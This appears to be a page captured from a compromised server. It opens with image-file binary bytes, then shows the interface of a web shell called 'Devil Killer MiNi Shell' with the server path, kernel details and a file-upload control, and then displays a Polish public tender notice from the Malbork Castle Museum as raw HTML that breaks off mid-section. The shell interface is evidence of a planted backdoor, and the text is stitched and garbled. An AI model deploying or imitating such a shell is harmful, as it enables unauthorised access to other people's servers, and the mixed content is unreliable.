JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240508/0031557801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Produkcja i dostawa magnesów i zakładek magnetycznych dla Muzeum Zamkowego w Malborku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM ZAMKOWE W MALBORKU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zamek Malbork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276073</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Starościńska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malbork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zamek.malbork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zamek.malbork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Produkcja i dostawa magnesów i zakładek magnetycznych dla Muzeum Zamkowego w Malborku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a7927e99-0d38-11ef-b4f6-06f4b0c1d0b5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00315578</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00059984/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.12 Produkcja i dostawa magnesów oraz zakładek magnetycznych dla Muzeum Zamkowego w Malborku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zamek_malbork <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zamek_malbork</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę należy złożyć zgodnie z wymogami określonymi w SWZ w szczególności w Dziale I, VII, IX SWZ.<br/>1. Instrukcje korzystania z Platformy zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>2. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy zakupowej (platformazakupowa.pl) określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem https://platformazakupowa.pl/pn/zamek_malbork w zakładce „Regulamin&#34; oraz uznaje go za<br/>wiążący,<br/>2) zapoznał i stosuje się do Instrukcji dostępnych pod adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>3. Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1. Przedmiotowe środki dowodowe (próbki), opisane w ust. 8 Działu VI oraz ust. 4 Działu XIV SWZ, winny być złożone z zachowaniem nieprzekraczalnego<br/>terminu wyznaczonego na składanie ofert.<br/>1) Złożenie próbek do oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 – Prawo pocztowe (tj. Dz.U. z 2023r. poz.1640), osobiście lub za pośrednictwem posłańca;<br/>2) Przedmiotowe środki dowodowe (próbki) należy złożyć w siedzibie Zamawiającego (Muzeum Zamkowe w Malborku, ul. Starościńska 1, 82-200 Malbork - sekretariat muzeum);<br/>3) Przedmiotowe środeki dowodowe (próbki) należy umieścić w zamkniętym opakowaniu (koperta, paczka) uniemożliwiającym zapoznanie się z jego zawartością bez uszkodzenia tego opakowania;<br/>4) Kopertę (paczkę) należy opisać zgodnie z Działem X ust. 3 pkt. 4) SWZ.<br/>5) Na kopercie (paczce) oprócz opisu jw. należy umieścić nazwę i adres Wykonawcy.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe regulacje w zakresie RODO zostały określone w Dziale XVIII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe regulacje w zakresie RODO zostały określone w Dziale XVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2611.8.1.2024.mw</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest usługa wykonania (produkcja) i dostawa magnesów oraz zakładek magnetycznych (zwane „produktem”) w ilościach i rodzajach wskazanych w zestawieniu w OPZ tj. specyfikacji materiałowo – technicznej przedmiotu zamówienia.<br/>2.	Przedmiot zamówienia musi być fabrycznie nowy, I kategorii, pełnowartościowy, wolny od wad fizycznych i prawnych, w pierwszym gatunku i spełniać co najmniej następujące wymagania:<br/>1)	musi być wysokiej jakości,<br/>2)	musi być trwały tj. magnesy i zakładki magnetyczne nie ulegają trwałym zniekształceniom, pęknięciom, odbarwieniom (nie ulega zniszczeniu przy korzystaniu zgodnie z przeznaczeniem),<br/>3)	będzie się charakteryzował estetyką i precyzją (starannością) wykonania,<br/>4)	będzie funkcjonalny, tj. powinien spełniać swoje przeznaczenie, magnesy i zakładki mają zapewniać łatwe i bezproblemowe korzystanie z nich,<br/>5)	wykonywany nadruk na magnesach i nakładkach magnetycznych musi być wykonany trwale, techniką odpowiednią dla materiału na którym będzie dokonany nadruk,<br/>6)	musi być dopuszczony do obrotu na terenie UE,<br/>7)	musi spełniać wymagane normy, posiadać stosowne certyfikaty, szczególnie dotyczące użytkowania produktów przez dzieci i młodzież (jeżeli są wymagane).<br/>3.	Szczegółowy opis przedmiotu zamówienia ujęty jest w załączniku nr 1 do SWZ tj. projekcie umowy i w załączniku nr 1 do umowy tj. szczegółowym opisie przedmiotu zamówienia, zwanym dalej OPZ.<br/>4.	Zgodnie z art. 101 ust. 4 ustawy PZP w sytuacji, gdyby w załącznikach do SWZ tj. projekcie umowy lub opisie przedmiotu zamówienia zawarto odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy PZP, a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, należy przyjąć, że każdej: normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79340000-9 - Usługi reklamowe i marketingowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31630000-1 - Magnesy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Prawo opcji (zmniejszenie zakresu):<br/>1)	Zamawiający zastrzega sobie możliwość nie wykorzystania całego przedmiotu zamówienia. Podane w OPZ ilości są objęte zamówieniem podstawowym. Zamawiający zastrzega sobie możliwość zmniejszenia zapotrzebowania do 50% zamówienia wycenionego przez Wykonawcę w formularzu cenowym, zarówno w zakresie poszczególnych pozycji, jak i całego wolumenu zamówienia,<br/>2)	w sytuacji opisanej w pkt. 1) powyżej Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem ilości przedmiotu zamówienia, <br/>a Wykonawca nie będzie rościł wykonania całości przedmiotu zamówienia.<br/>2.	Regulacje związane z prawem opcji w tym możliwości z jego skorzystania zostało opisane w § 1 projektu umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1) Zamawiający przewiduje możliwość udzielenia zamówienia polegającego na powtórzeniu podobnych usług na podstawie art. 305 pkt. 1) w zw. z art. 214 ust. 1 pkt 7) ustawy PZP, na poniższych zasadach:<br/>a)	Zamawiający przewiduje możliwość udzielenia dotychczasowemu Wykonawcy usług, w okresie 3 lat od udzielenia zamówienia podstawowego zamówień do 10% wartości zamówienia podstawowego, polegających na powtórzeniu podobnych usług, tj. produkcji i dostawie magnesów oraz zakładek magnetycznych (zwane „produktem”) wskazanych w specyfikacji materiałowo – technicznej przedmiotu zamówienia opisanej w pkt. 13 Szczegółowego opisu przedmiotu zamówienia, który stanowi załącznik nr 1 do umowy,<br/>b)	Udzielanie przedmiotowego zamówienia, o którym mowa powyżej może nastąpić gdy zaistnieje uzasadniona potrzeba rozszerzenia/przedłużenia zamówienia podstawowego (w tym m.in. wyczerpanie zamówienia podstawowego przed upływem 12 miesięcy lub brak wyboru kolejnego Wykonawcy lub przedłużająca się kolejna procedura o udzielenie zamówienia publicznego) i zostaną zapewnione środki finansowe na ten cel.<br/>c)	Zamówienia, o których mowa powyżej mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki na podstawie art. 305 pkt. 1 w zw. z art. 214 ust. 1 pkt. 7) ustawy PZP.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu zostanie uznany za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech (3) lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 2 usługi w ramach dwóch odrębnych umów/ kontraktów/ zamówień polegające na wykonaniu i dostawie magnesów i/lub zakładek magnetycznych o wartości co najmniej 20.000,00 złotych brutto każda.<br/>UWAGA:<br/>1) Jeżeli Wykonawca w celu potwierdzenia spełniania warunku w udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony, jeżeli spełnia go w całości ten podmiot.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wyżej wymieniony warunek udziału w postępowaniu winien spełniać w całości co najmniej jeden z Wykonawców.<br/>3) W przypadku, gdy wartość wykazanej usługi zostanie podana w walucie innej niż PLN, Zamawiający, w celu oceny spełnienia warunku udziału, przeliczy jej wartość wg średniego kursu Narodowego Banku Polskiego na dzień w którym opublikowano ogłoszenie o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie opublikuje tabeli kursów walut, Zamawiający przyjmie kurs przeliczeniowy według ostatniej tabeli kursów Narodowego Banku Polskiego, opublikowanej przed dniem publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Przed wyborem najkorzystniejszej oferty Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych potwierdzających spełnienie warunku udziału w postępowaniu tj.:<br/>1)	wykaz usług wykonanych w okresie ostatnich 3 lat liczonym wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy - wzór wykazu usług (pdf) stanowi załącznik nr 7 do SWZ.<br/>UWAGA: Edytowalny wzór wykazu usług będzie przekazany Wykonawcy wraz <br/>z wezwaniem, o którym mowa w niniejszym ustępie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	W niniejszym postępowaniu żąda się przedmiotowych środków dowodowych.<br/>2)	Na potwierdzenie, że oferowane usługi spełniają określone przez Zamawiającego wymagania, cechy lub kryteria opisane w Dziale XIV ust. 4 SWZ i opisie przedmiotu zamówienia Zamawiający żąda złożenia wraz z ofertą, niżej opisany przedmiotowy środek dowodowy tj.<br/>1)	Próbka nr 1 - Magnes nr 1 o parametrach: <br/>a)	wymiary: 85x54mm +/- 5% ,<br/>b)	grubość całkowita min. 3 mm,<br/>c)	magnes musi być sztywny,<br/>d)	magnes (tylna część magnesu): na 100% powierzchni,<br/>e)	zadruk całościowy – grafika z widokiem/widokami oraz z napisem i/ lub logo, <br/>2)	Próbka nr 2 - Magnes nr 2 o parametrach: <br/>a)	wymiary 60x135mm +/- 5%,<br/>b)	grubość całkowita min. 3 mm,<br/>c)	magnes musi być sztywny,<br/>d)	magnes (tylna część magnesu): na 100% powierzchni,<br/>e)	całościowy –grafika z widokiem/widokami/panoramą oraz z napisem i/ lub logo, <br/>3)	Próbka nr 3 - Magnes nr 3 o parametrach: <br/>a)	różnokształtny magnes (kształt nieregularny nie dopuszcza się magnesu kwadratowego, prostokątnego lub owalnego), <br/>b)	magnes musi być elastyczny,<br/>c)	magnes (tylna część magnesu)na 100% powierzchni,<br/>d)	zadruk na całej przedniej powierzchni magnesu – zadruk – dowolna grafika,<br/>4)	Próbka nr 4 - Zakładka magnetyczna do książki o parametrach: <br/>a)	wymiary po łożeniu zakładki 40x70mm +/- 5%, <br/>b)	grubość zakładki po rozłożeniu min. 0,5 mm,<br/>c)	warstwa magnetyczna na całej powierzchni (z niewielką przerwą na złożenie),<br/>d)	z obu stron zakładki nadruk, – grafika z widokiem/widokami/ panoramą oraz z napisem i/ lub logo,<br/>e)	zakładka musi być elastyczna,<br/>UWAGA: jeżeli Wykonawca nie dostarczy którejkolwiek z próbki (przedmiotowego środka dowodowego) np. próbki nr 1 lub nr 2 lub nr 3 lub nr 4 oferta Wykonawcy będzie podlegała odrzuceniu. <br/>Pozostałe wymagania i informacje w zakresie przedmiotowego środka dowodowego ujęte są w SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z ofertą (formularz ofertowy, który stanowi załącznik nr 2 do SWZ) składa:<br/>1)	Oświadczenie z art. 125 ust. 1 ustawy PZP – wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>2)	Oświadczenie podmiotu udostępniającego zasoby z art. 125 ust. 5 ustawy PZP – wzór oświadczenia stanowi załącznik nr 4 do SWZ (jeżeli dotyczy).<br/>3)	Oświadczenie Wykonawcy wspólnie ubiegającego się o zamówienie na podstawie art. 117 ust. 4 PZP – wzór oświadczenia stanowi załącznik nr 5 do SWZ (jeżeli dotyczy).<br/>4)	Zobowiązanie innego podmiotu – wzór zobowiązania stanowi załącznik nr 6 do SWZ (jeżeli dotyczy).<br/>5)	Dokument wadium w formie niepieniężnej (jeżeli dotyczy).<br/>6)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z właściwego rejestru (jeżeli dotyczy).<br/>7)	Przedmiotowe środki dowodowe (próbki) - Uwaga! Próbki, składane są z wyłączeniem środków komunikacji elektronicznej, zgodnie z wytycznymi zawartymi w Dziale X ust. 3 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do niniejszego postępowania jest zobowiązany wnieść wadium o wartości: 1.000,00 zł (słownie: jeden tysiąc złotych) na czas związania ofertą.<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy PZP.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	W przypadku wniesienia wadium w formach określonych powyżej w ust. 3 pkt. 2) – 4) powyżej dokument winien być wystawiony na Muzeum Zamkowe w Malborku, ul. Starościńska 1, 82-200 Malbork.<br/>5.	Wadium w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego: <br/>BGK O/Gdańsk 